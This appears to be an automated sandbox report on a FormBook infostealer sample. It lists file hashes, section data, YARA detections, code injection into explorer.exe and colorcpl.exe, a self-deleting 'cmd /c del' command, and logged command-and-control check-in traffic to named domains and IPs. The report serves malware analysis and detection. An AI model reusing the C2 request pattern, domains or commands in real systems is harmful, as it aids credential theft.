                                      SSDEEP:12288:TkB9yywVrLzwY3TQ4PDUUoUqSYvCeRz42p/7:TYwVL3TQ4lXq472h
                                      TLSH:C4F48D3C1BFC8556E039D7758BB04C20E7EDB5177636CE1E79EA01890A27A42768336E
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....*%d..............P..f...,........... ........@.. ....................................@................................
                                      Icon Hash:8cb239695470acd4
                                      Entrypoint:0x4b841a
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                      Time Stamp:0x64252A0C [Thu Mar 30 06:19:56 2023 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:4
                                      OS Version Minor:0
                                      File Version Major:4
                                      File Version Minor:0
                                      Subsystem Version Major:4
                                      Subsystem Version Minor:0
                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                      Instruction
                                      jmp dword ptr [00402000h]
                                      add byte ptr [eax], al
                                      Name | Virtual Address | Virtual Size | Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb83c8 | 0x4f | .text
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xba000 | 0x28dc | .rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xbe000 | 0xc | .reloc
                                      IMAGE_DIRECTORY_ENTRY_DEBUG | 0xb1eb4 | 0x54 | .text
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                      IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                      Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                      .text | 0x2000 | 0xb6420 | 0xb6600 | False | 0.6937342036497601 | data | 7.289721058051092 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      .rsrc | 0xba000 | 0x28dc | 0x2a00 | False | 0.9165736607142857 | data | 7.62473483572048 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .reloc | 0xbe000 | 0xc | 0x200 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                      Name | RVA | Size | Type | Language | Country
                                      RT_ICON | 0xba0c8 | 0x249c | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | |
                                      RT_GROUP_ICON | 0xbc574 | 0x14 | data | |
                                      RT_VERSION | 0xbc598 | 0x340 | data | |

                                      DLL | Import
                                      mscoree.dll | _CorExeMain

                                      Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                      03/30/23-20:53:01.782313 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49699 | 80 | 192.168.2.3 | 15.197.142.173
                                      03/30/23-20:53:01.782313 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49699 | 80 | 192.168.2.3 | 15.197.142.173
                                      03/30/23-20:53:01.782313 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49699 | 80 | 192.168.2.3 | 15.197.142.173

                                      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                      Mar 30, 2023 20:52:32.841531992 CEST | 49698 | 80 | 192.168.2.3 | 66.235.200.145
                                      Mar 30, 2023 20:52:32.858952045 CEST | 80 | 49698 | 66.235.200.145 | 192.168.2.3
                                      Mar 30, 2023 20:52:32.859565020 CEST | 49698 | 80 | 192.168.2.3 | 66.235.200.145
                                      Mar 30, 2023 20:52:32.859565020 CEST | 49698 | 80 | 192.168.2.3 | 66.235.200.145
                                      Mar 30, 2023 20:52:32.876929998 CEST | 80 | 49698 | 66.235.200.145 | 192.168.2.3
                                      Mar 30, 2023 20:52:33.053632975 CEST | 80 | 49698 | 66.235.200.145 | 192.168.2.3
                                      Mar 30, 2023 20:52:33.053666115 CEST | 80 | 49698 | 66.235.200.145 | 192.168.2.3
                                      Mar 30, 2023 20:52:33.053930998 CEST | 49698 | 80 | 192.168.2.3 | 66.235.200.145
                                      Mar 30, 2023 20:52:33.054528952 CEST | 80 | 49698 | 66.235.200.145 | 192.168.2.3
                                      Mar 30, 2023 20:52:33.054725885 CEST | 49698 | 80 | 192.168.2.3 | 66.235.200.145
                                      Mar 30, 2023 20:52:33.064307928 CEST | 49698 | 80 | 192.168.2.3 | 66.235.200.145

                                      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                      Mar 30, 2023 20:52:32.680023909 CEST | 62704 | 53 | 192.168.2.3 | 8.8.8.8
                                      Mar 30, 2023 20:52:32.835279942 CEST | 53 | 62704 | 8.8.8.8 | 192.168.2.3
                                      Mar 30, 2023 20:53:01.710021973 CEST | 49977 | 53 | 192.168.2.3 | 8.8.8.8
                                      Mar 30, 2023 20:53:01.762501001 CEST | 53 | 49977 | 8.8.8.8 | 192.168.2.3

                                      Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                      Mar 30, 2023 20:52:32.680023909 CEST | 192.168.2.3 | 8.8.8.8 | 0x1191 | Standard query (0) | www.adornmentwithadrienne.com | A (IP address) | IN (0x0001) | false
                                      Mar 30, 2023 20:53:01.710021973 CEST | 192.168.2.3 | 8.8.8.8 | 0xfbb9 | Standard query (0) | www.dafabetvn.info | A (IP address) | IN (0x0001) | false

                                      Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                      Mar 30, 2023 20:52:32.835279942 CEST | 8.8.8.8 | 192.168.2.3 | 0x1191 | No error (0) | www.adornmentwithadrienne.com | adornmentwithadrienne.com | | CNAME (Canonical name) | IN (0x0001) | false
                                      Mar 30, 2023 20:52:32.835279942 CEST | 8.8.8.8 | 192.168.2.3 | 0x1191 | No error (0) | adornmentwithadrienne.com | | 66.235.200.145 | A (IP address) | IN (0x0001) | false
                                      Mar 30, 2023 20:53:01.762501001 CEST | 8.8.8.8 | 192.168.2.3 | 0xfbb9 | No error (0) | www.dafabetvn.info | dafabetvn.info | | CNAME (Canonical name) | IN (0x0001) | false
                                      Mar 30, 2023 20:53:01.762501001 CEST | 8.8.8.8 | 192.168.2.3 | 0xfbb9 | No error (0) | dafabetvn.info | | 15.197.142.173 | A (IP address) | IN (0x0001) | false
                                      Mar 30, 2023 20:53:01.762501001 CEST | 8.8.8.8 | 192.168.2.3 | 0xfbb9 | No error (0) | dafabetvn.info | | 3.33.152.147 | A (IP address) | IN (0x0001) | false

                                      • www.adornmentwithadrienne.com
                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                      0 | 192.168.2.3 | 49698 | 66.235.200.145 | 80 | C:\Windows\explorer.exe

                                      Timestamp | kBytes transferred | Direction | Data
                                      Mar 30, 2023 20:52:32.859565020 CEST | 103 | OUT | GET /ne28/?yXB=JRhSHg+E0kVeMb5bWxBNKjX7GZb/Gd7gTaCbDgRTO6UaOuEkMa6xiN+s4LYpa+moX3ut&DR-Hl=f48d7hbXPvmPj HTTP/1.1
                                      Host: www.adornmentwithadrienne.com
                                      Connection: close
                                      Data Raw: 00 00 00 00 00 00 00
                                      Data Ascii:
                                      Mar 30, 2023 20:52:33.053632975 CEST | 104 | IN | HTTP/1.1 301 Moved Permanently
                                      Date: Thu, 30 Mar 2023 18:52:33 GMT
                                      Content-Type: text/html; charset=iso-8859-1
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Location: https://www.adornmentwithadrienne.com/ne28/?yXB=JRhSHg+E0kVeMb5bWxBNKjX7GZb/Gd7gTaCbDgRTO6UaOuEkMa6xiN+s4LYpa+moX3ut&DR-Hl=f48d7hbXPvmPj
                                      CF-Cache-Status: MISS
                                      Server: cloudflare
                                      CF-RAY: 7b028ce16955916e-FRA
                                      Data Ascii: 15c<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.adornmentwithadrienne.com/ne28/?yXB=JRhSHg+E0kVeMb5bWxBNKjX7GZb/Gd7gTaCbDgRTO6UaOuEkMa6xiN+s4LYpa+moX3ut&amp;DR-Hl=f48d7hbXPvmPj">here</a>.</p></body></html>
                                      Mar 30, 2023 20:52:33.053666115 CEST | 104 | IN | Data Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Code Manipulations

                                      Function Name | Hook Type | Active in Processes
                                      PeekMessageA | INLINE | explorer.exe
                                      PeekMessageW | INLINE | explorer.exe
                                      GetMessageW | INLINE | explorer.exe
                                      GetMessageA | INLINE | explorer.exe

                                      Function Name | Hook Type | New Data
                                      PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x89 0x9E 0xE4
                                      PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x81 0x1E 0xE4
                                      GetMessageW | INLINE | 0x48 0x8B 0xB8 0x81 0x1E 0xE4
                                      GetMessageA | INLINE | 0x48 0x8B 0xB8 0x89 0x9E 0xE4


                                      Target ID:0
                                      Start time:20:50:46
                                      Start date:30/03/2023
                                      Path:C:\Users\user\Desktop\ClbrTLBbVA.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Users\user\Desktop\ClbrTLBbVA.exe
                                      Imagebase:0x1d0000
                                      File size:758784 bytes
                                      MD5 hash:441AA97AF8AB929AF47AF76962584B02
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:.Net C# or VB.NET
                                      Yara matches:
                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.305424927.000000000294C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.310875982.00000000036F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.310875982.00000000036F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Diceloader_15eeb7b9, Description: unknown, Source: 00000000.00000002.310875982.00000000036F0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.310875982.00000000036F0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.310875982.00000000036F0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.310875982.00000000036F0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                      Reputation:low

                                      Target ID:10
                                      Start time:20:50:59
                                      Start date:30/03/2023
                                      Path:C:\Users\user\Desktop\ClbrTLBbVA.exe
                                      Wow64 process (32bit):false
                                      Commandline:{path}
                                      Imagebase:0x230000
                                      File size:758784 bytes
                                      MD5 hash:441AA97AF8AB929AF47AF76962584B02
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low

                                      Target ID:11
                                      Start time:20:50:59
                                      Start date:30/03/2023
                                      Path:C:\Users\user\Desktop\ClbrTLBbVA.exe
                                      Wow64 process (32bit):true
                                      Commandline:{path}
                                      Imagebase:0xb70000
                                      File size:758784 bytes
                                      MD5 hash:441AA97AF8AB929AF47AF76962584B02
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.345448384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.345448384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Diceloader_15eeb7b9, Description: unknown, Source: 0000000B.00000002.345448384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.345448384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.345448384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.345448384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: Windows_Trojan_Diceloader_15eeb7b9, Description: unknown, Source: 0000000B.00000002.345666736.00000000011BF000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                      Reputation:low

                                      Target ID:12
                                      Start time:20:51:06
                                      Start date:30/03/2023
                                      Path:C:\Windows\explorer.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\Explorer.EXE
                                      Imagebase:0x7ff69fe90000
                                      File size:3933184 bytes
                                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      Target ID:13
                                      Start time:20:51:18
                                      Start date:30/03/2023
                                      Path:C:\Windows\SysWOW64\colorcpl.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\SysWOW64\colorcpl.exe
                                      Imagebase:0x1210000
                                      File size:86528 bytes
                                      MD5 hash:746F3B5E7652EA0766BA10414D317981
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.528383336.0000000000740000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.528383336.0000000000740000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Diceloader_15eeb7b9, Description: unknown, Source: 0000000D.00000002.528383336.0000000000740000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.528383336.0000000000740000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.528383336.0000000000740000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.528383336.0000000000740000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.528812589.0000000000970000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.528812589.0000000000970000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Diceloader_15eeb7b9, Description: unknown, Source: 0000000D.00000002.528812589.0000000000970000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.528812589.0000000000970000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.528812589.0000000000970000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.528812589.0000000000970000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.526498466.0000000000170000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.526498466.0000000000170000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Diceloader_15eeb7b9, Description: unknown, Source: 0000000D.00000002.526498466.0000000000170000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.526498466.0000000000170000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.526498466.0000000000170000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.526498466.0000000000170000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                      Reputation:high

                                      Target ID:14
                                      Start time:20:51:26
                                      Start date:30/03/2023
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:/c del "C:\Users\user\Desktop\ClbrTLBbVA.exe"
                                      Imagebase:0xb0000
                                      File size:232960 bytes
                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language

                                      Target ID:15
                                      Start time:20:51:27
                                      Start date:30/03/2023
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff745070000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language


                                        Execution Graph

                                        Execution Coverage:13.4%
                                        Dynamic/Decrypted Code Coverage:100%
                                        Signature Coverage:0%
                                        Total number of Nodes:41
                                        Total number of Limit Nodes:3
                                        execution_graph 8491 c2e160 SetWindowLongW 8492 c2e1cc 8491->8492 8524 c26a50 GetCurrentProcess 8525 c26ac3 8524->8525 8526 c26aca GetCurrentThread 8524->8526 8525->8526 8527 c26b00 8526->8527 8528 c26b07 GetCurrentProcess 8526->8528 8527->8528 8529 c26b3d 8528->8529 8533 c27009 8529->8533 8530 c26b65 GetCurrentThreadId 8531 c26b96 8530->8531 8534 c2707a DuplicateHandle 8533->8534 8536 c27012 8533->8536 8535 c27116 8534->8535 8535->8530 8536->8530 8493 c27628 8494 c27650 8493->8494 8495 c27678 8494->8495 8497 c26ca4 8494->8497 8498 c26caf 8497->8498 8501 c2b6c8 8498->8501 8499 c27720 8499->8495 8503 c2b6f9 8501->8503 8504 c2b746 8501->8504 8502 c2b705 8502->8499 8503->8502 8506 c2ba10 8503->8506 8504->8499 8509 c2ba50 8506->8509 8507 c2ba1a 8507->8504 8510 c2ba73 8509->8510 8511 c2ba8b 8510->8511 8516 c2bce8 8510->8516 8511->8507 8512 c2ba83 8512->8511 8513 c2bc88 GetModuleHandleW 8512->8513 8514 c2bcb5 8513->8514 8514->8507 8517 c2bcfc 8516->8517 8518 c2bd21 8517->8518 8520 c2a998 8517->8520 8518->8512 8521 c2bec8 LoadLibraryExW 8520->8521 8523 c2bf41 8521->8523 8523->8518 8537 c2df18 8538 c2df80 CreateWindowExW 8537->8538 8540 c2e03c 8538->8540

                                        Control-flow Graph

                                        APIs
                                        • GetCurrentProcess.KERNEL32 ref: 00C26AB0
                                        • GetCurrentThread.KERNEL32 ref: 00C26AED
                                        • GetCurrentProcess.KERNEL32 ref: 00C26B2A
                                        • GetCurrentThreadId.KERNEL32 ref: 00C26B83
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.304138077.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_c20000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID: Current$ProcessThread
                                        • String ID:
                                        • API String ID: 2063062207-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        APIs
                                        • GetCurrentProcess.KERNEL32 ref: 00C26AB0
                                        • GetCurrentThread.KERNEL32 ref: 00C26AED
                                        • GetCurrentProcess.KERNEL32 ref: 00C26B2A
                                        • GetCurrentThreadId.KERNEL32 ref: 00C26B83
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.304138077.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_c20000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID: Current$ProcessThread
                                        • String ID:
                                        • API String ID: 2063062207-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        APIs
                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 00C2BCA6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.304138077.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_c20000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID: HandleModule
                                        • String ID:
                                        • API String ID: 4139908857-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 93 c2df18-c2df7e 94 c2df80-c2df86 93->94 95 c2df89-c2df90 93->95 94->95 96 c2df92-c2df98 95->96 97 c2df9b-c2e03a CreateWindowExW 95->97 96->97 99 c2e043-c2e07b 97->99 100 c2e03c-c2e042 97->100 104 c2e088 99->104 105 c2e07d-c2e080 99->105 100->99 106 c2e089 104->106 105->104 106->106
                                        APIs
                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00C2E02A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.304138077.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_c20000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID: CreateWindow
                                        • String ID:
                                        • API String ID: 716092398-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 107 c27009-c27010 108 c27012-c27041 call c26c44 107->108 109 c2707a-c27114 DuplicateHandle 107->109 113 c27046-c2706c 108->113 111 c27116-c2711c 109->111 112 c2711d-c2713a 109->112 111->112
                                        APIs
                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00C27107
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.304138077.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_c20000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID: DuplicateHandle
                                        • String ID:
                                        • API String ID: 3793708945-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 118 c27078-c27114 DuplicateHandle 119 c27116-c2711c 118->119 120 c2711d-c2713a 118->120 119->120
                                        APIs
                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00C27107
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.304138077.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_c20000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID: DuplicateHandle
                                        • String ID:
                                        • API String ID: 3793708945-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 123 c27080-c27114 DuplicateHandle 124 c27116-c2711c 123->124 125 c2711d-c2713a 123->125 124->125
                                        APIs
                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00C27107
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.304138077.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_c20000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID: DuplicateHandle
                                        • String ID:
                                        • API String ID: 3793708945-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 128 c2a998-c2bf08 130 c2bf10-c2bf3f LoadLibraryExW 128->130 131 c2bf0a-c2bf0d 128->131 132 c2bf41-c2bf47 130->132 133 c2bf48-c2bf65 130->133 131->130 132->133
                                        APIs
                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00C2BD21,00000800,00000000,00000000), ref: 00C2BF32
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.304138077.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_c20000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID: LibraryLoad
                                        • String ID:
                                        • API String ID: 1029625771-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 136 c2bc40-c2bc80 137 c2bc82-c2bc85 136->137 138 c2bc88-c2bcb3 GetModuleHandleW 136->138 137->138 139 c2bcb5-c2bcbb 138->139 140 c2bcbc-c2bcd0 138->140 139->140
                                        APIs
                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 00C2BCA6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.304138077.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_c20000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID: HandleModule
                                        • String ID:
                                        • API String ID: 4139908857-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 142 c2e159-c2e1ca SetWindowLongW 143 c2e1d3-c2e1e7 142->143 144 c2e1cc-c2e1d2 142->144 144->143
                                        APIs
                                        • SetWindowLongW.USER32(?,?,?), ref: 00C2E1BD
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.304138077.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_c20000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID: LongWindow
                                        • String ID:
                                        • API String ID: 1378638983-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 146 c2e160-c2e1ca SetWindowLongW 147 c2e1d3-c2e1e7 146->147 148 c2e1cc-c2e1d2 146->148 148->147
                                        APIs
                                        • SetWindowLongW.USER32(?,?,?), ref: 00C2E1BD
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.304138077.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_c20000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID: LongWindow
                                        • String ID:
                                        • API String ID: 1378638983-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000000.00000002.304138077.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_c20000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
